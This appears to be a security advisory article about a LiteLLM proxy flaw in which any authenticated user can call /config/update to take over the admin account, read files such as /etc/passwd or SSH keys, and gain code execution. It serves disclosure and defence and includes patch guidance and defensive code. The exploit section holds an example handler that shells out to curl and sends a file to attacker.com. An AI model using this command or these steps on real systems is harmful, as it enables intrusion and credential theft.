Any authenticated user on a LiteLLM proxy server can escalate privileges to full server control through the /config/update endpoint, which lacks an admin role check. This high-severity flaw lets attackers modify configuration, execute code remotely, read arbitrary files, and hijack admin accounts. LiteLLM fixed it in version 1.83.0, but unpatched instances remain exposed.



LiteLLM serves as a lightweight proxy for large language models, routing requests to providers like OpenAI, Anthropic, and others via a unified OpenAI-compatible API. It handles load balancing, key management, and spend tracking. With over 10,000 GitHub stars and adoption by teams at companies like Microsoft and Databricks, it powers production LLM deployments. However, its multi-user support introduces risk when authorization checks are missing: a valid key proves who a caller is, not what that caller is allowed to change.

Exploit Paths

The core issue lies in the /config/update endpoint, which updates proxy settings without checking for the proxy_admin role. Any authenticated user holding a valid API key can send it a POST request with a malicious payload.
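The missing step can be illustrated with a minimal, framework-free sketch. Only the proxy_admin role name comes from the advisory as described above; the `Caller` type, the `Forbidden` exception, and `update_config` are hypothetical names made up for illustration and are not LiteLLM's actual code.

```python
from dataclasses import dataclass

# Role name taken from the article; everything else here is hypothetical.
ADMIN_ROLE = "proxy_admin"


@dataclass
class Caller:
    """Hypothetical stand-in for the identity resolved from an API key."""
    key_alias: str
    role: str


class Forbidden(Exception):
    """Raised when an authenticated caller lacks the required role."""


def update_config(caller: Caller, current: dict, changes: dict) -> dict:
    """Return the merged config, but only for callers holding the admin role."""
    # Authentication (a valid key) is assumed to have succeeded already.
    # This is the separate authorization step the vulnerable endpoint skipped.
    if caller.role != ADMIN_ROLE:
        raise Forbidden(f"{caller.key_alias} lacks role {ADMIN_ROLE}")
    return {**current, **changes}
```

With a guard like this, a regular user's attempt to set UI_PASSWORD raises `Forbidden` before any setting is touched, while an admin's call merges the changes as before.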

Attackers first rewrite environment variables and proxy configs. They overwrite UI_USERNAME and UI_PASSWORD to seize the admin dashboard. This grants persistent access even after restarts, as LiteLLM pulls these from the environment.

For remote code execution (RCE), they register custom pass-through handlers. LiteLLM’s passthrough_handler feature executes Python code for non-standard endpoints. An attacker points a handler at Python code they control, for example:

    def handler(request):
        import subprocess
        subprocess.run(["/bin/sh", "-c", "curl -d @/tmp/payload http://attacker.com"])
        return {"status": "ok"}

Once registered via /config/update, triggering the handler runs arbitrary commands on the host.

File disclosure follows: Set UI_LOGO_PATH to /etc/passwd or /root/.ssh/id_rsa, then hit /get_image. The endpoint serves the file as an image, bypassing restrictions. Sensitive data like API keys or configs spills out.
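On the defensive side, a file-serving endpoint can refuse any configured path that is not an image inside a dedicated assets directory. The sketch below shows that general technique under stated assumptions: `is_safe_logo_path`, the `assets_dir` parameter, and the suffix list are hypothetical and do not describe how LiteLLM's patch works.

```python
from pathlib import Path

# Hypothetical allowlist of image extensions.
ALLOWED_SUFFIXES = {".png", ".jpg", ".jpeg", ".svg"}


def is_safe_logo_path(candidate: str, assets_dir: str) -> bool:
    """Return True only if candidate is an image path inside assets_dir."""
    base = Path(assets_dir).resolve()
    # Joining an absolute candidate (e.g. /etc/passwd) discards base entirely,
    # and ".." segments are collapsed by resolve(); both cases are caught by
    # the containment check below.
    target = (base / candidate).resolve()
    if target.suffix.lower() not in ALLOWED_SUFFIXES:
        return False
    return base in target.parents
```

Under this check, `/etc/passwd` and `/root/.ssh/id_rsa` fail on the extension test, and a path such as `../other/logo.png` fails on containment.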

Fix and Immediate Steps

Version 1.83.0, released promptly after disclosure, enforces proxy_admin role checks on /config/update. Upgrade with pip install --upgrade "litellm>=1.83.0" (pinning litellm==1.83.0 installs exactly that release, not a later one). Then verify your deployment: check litellm --version and review logs for suspicious /config/update calls.
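For fleets where running the CLI by hand is impractical, the version check can be scripted. This is a rough sketch using only the standard library; the helper names are hypothetical, and the parser deliberately ignores pre-release and post-release suffixes, so a stricter comparison (for instance with the third-party `packaging` library) may be preferable.

```python
from importlib.metadata import PackageNotFoundError, version

# First fixed release, per the article.
FIXED = (1, 83, 0)


def parse_release(text: str) -> tuple:
    """Parse the leading numeric components of a version like '1.83.2.post1'."""
    parts = []
    for piece in text.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break  # stop at the first non-numeric component, e.g. 'post1'
        parts.append(int(digits))
    # Pad so that '1.83' compares equal to '1.83.0'.
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_patched(installed: str, fixed: tuple = FIXED) -> bool:
    """True if the installed release is at or above the fixed release."""
    return parse_release(installed) >= fixed


def installed_litellm_version():
    """Return the installed litellm version string, or None if absent."""
    try:
        return version("litellm")
    except PackageNotFoundError:
        return None
```

A call such as `is_patched(installed_litellm_version() or "0")` inside each image or pod gives a quick yes/no answer per environment.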

No server-side config workaround exists. Limit damage by tightly controlling API keys: issue team-scoped keys, revoke unused ones, and audit via LiteLLM’s /key/list. Run behind a reverse proxy like Nginx with IP allowlisting or additional auth layers.

Scan your environment: Docker images or Kubernetes pods may still be running older versions. LiteLLM’s GitHub advisory rates the issue as high severity. No public exploits are known yet, but the attack is simple enough to invite copycats.

Why This Matters

LLM proxies like LiteLLM centralize access to costly APIs, often fronting keys and traffic worth thousands of dollars. A single compromised user account, whether through phishing or a leaked key, turns the proxy into an RCE beachhead. Attackers could exfiltrate prompt histories, inject poisoned responses, or pivot to internal networks.

This vulnerability underscores risks in open-source LLM tools: rapid iteration favors features over ironclad authorization. LiteLLM’s team patched fast, earning credit, but earlier audits might have caught it. Teams should treat proxies as high-value targets: enable LiteLLM’s Redis-backed auth, rotate keys monthly, and monitor for anomalous config changes.
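Monitoring for config changes can start as a simple scan of access logs for POST requests to /config/update. The sketch below assumes a generic reverse-proxy access log in which the method and path appear together on each line; that format, the sample lines, and the function name are assumptions for illustration, not LiteLLM's own log output.

```python
import re
from typing import Iterable, List

# Matches "POST /config/update" but not look-alike paths such as
# /config/update_foo, because of the trailing word boundary.
CONFIG_UPDATE = re.compile(r"\bPOST\s+/config/update\b")


def find_config_updates(lines: Iterable[str]) -> List[str]:
    """Return the log lines that record a POST to /config/update."""
    return [line.rstrip("\n") for line in lines if CONFIG_UPDATE.search(line)]


if __name__ == "__main__":
    # Made-up sample lines in an assumed access-log format.
    sample = [
        '203.0.113.7 - - "POST /config/update HTTP/1.1" 200\n',
        '203.0.113.7 - - "POST /chat/completions HTTP/1.1" 200\n',
        '203.0.113.9 - - "GET /config/update HTTP/1.1" 405\n',
    ]
    for hit in find_config_updates(sample):
        print(hit)
```

Any hit that does not correspond to a known admin action is worth investigating, particularly on instances that ran a version earlier than 1.83.0.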

Beyond LiteLLM, audit similar tools like Portkey or Helicone. In a world of shared LLM infra, privilege bugs amplify: One slip costs data, money, and trust. Update now, then harden.